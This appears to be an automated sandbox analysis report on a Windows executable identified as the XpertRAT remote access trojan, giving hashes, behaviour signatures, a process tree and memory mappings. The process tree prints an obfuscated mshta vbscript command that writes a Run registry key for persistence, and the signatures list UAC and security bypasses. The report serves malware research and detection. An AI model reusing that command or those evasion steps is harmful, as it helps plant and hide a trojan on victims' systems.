Analysis

  • max time kernel
    150s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    30-06-2022 17:06

General

  • Target

    962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe

  • Size

    792KB

  • MD5

    322b2bfde9f2f3d691b4fc1526182305

  • SHA1

    99bf7caed11dee1bf41bd039634af9d1468e8f69

  • SHA256

    962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353

  • SHA512

    6fb915635d37375fd08aa854fb5a1e85ca9bdb6b7a7f5972bf0ea8e677dd24f6128003635626bb0036ef62f04afae7296230cac38adea880a7fa537d694cb132

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe
    "C:\Users\Admin\AppData\Local\Temp\962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\FORRENT"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe"",""REG_SZ"" : window.close")
      2⤵
      • Modifies Internet Explorer settings
      PID:840
    • C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
      "C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1692
      • C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
        "C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe"
        3⤵
        • UAC bypass
        • Windows security bypass
        • Executes dropped EXE
        • Windows security modification
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:1856
        • C:\Program Files (x86)\Internet Explorer\iexplore.exe
          C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
          4⤵
            PID:940
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
            4⤵
            • Adds policy Run key to start application
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:900

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

      Filesize

      792KB

      MD5

      1bb033c5e2b4a4bb05987306d78e0438

      SHA1

      4208031de927ba66e730a55236ec3750ad59c589

      SHA256

      5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

      SHA512

      c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

    • C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

      Filesize

      792KB

      MD5

      1bb033c5e2b4a4bb05987306d78e0438

      SHA1

      4208031de927ba66e730a55236ec3750ad59c589

      SHA256

      5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

      SHA512

      c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

    • C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

      Filesize

      792KB

      MD5

      1bb033c5e2b4a4bb05987306d78e0438

      SHA1

      4208031de927ba66e730a55236ec3750ad59c589

      SHA256

      5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

      SHA512

      c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

    • \Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

      Filesize

      792KB

      MD5

      1bb033c5e2b4a4bb05987306d78e0438

      SHA1

      4208031de927ba66e730a55236ec3750ad59c589

      SHA256

      5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

      SHA512

      c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

    • \Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

      Filesize

      792KB

      MD5

      1bb033c5e2b4a4bb05987306d78e0438

      SHA1

      4208031de927ba66e730a55236ec3750ad59c589

      SHA256

      5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

      SHA512

      c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

    • \Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

      Filesize

      792KB

      MD5

      1bb033c5e2b4a4bb05987306d78e0438

      SHA1

      4208031de927ba66e730a55236ec3750ad59c589

      SHA256

      5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

      SHA512

      c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

    • memory/840-59-0x0000000000000000-mapping.dmp

    • memory/1472-66-0x0000000077300000-0x0000000077480000-memory.dmp

      Filesize

      1.5MB

    • memory/1472-57-0x0000000077120000-0x00000000772C9000-memory.dmp

      Filesize

      1.7MB

    • memory/1472-58-0x0000000077300000-0x0000000077480000-memory.dmp

      Filesize

      1.5MB

    • memory/1472-56-0x0000000074F21000-0x0000000074F23000-memory.dmp

      Filesize

      8KB

    • memory/1692-62-0x0000000000000000-mapping.dmp

    • memory/1692-74-0x0000000077120000-0x00000000772C9000-memory.dmp

      Filesize

      1.7MB

    • memory/1692-75-0x0000000077300000-0x0000000077480000-memory.dmp

      Filesize

      1.5MB

    • memory/1856-71-0x00000000004010B8-mapping.dmp

    • memory/1856-70-0x0000000000400000-0x000000000042C000-memory.dmp

      Filesize

      176KB

    • memory/1856-78-0x0000000000400000-0x000000000042C000-memory.dmp

      Filesize

      176KB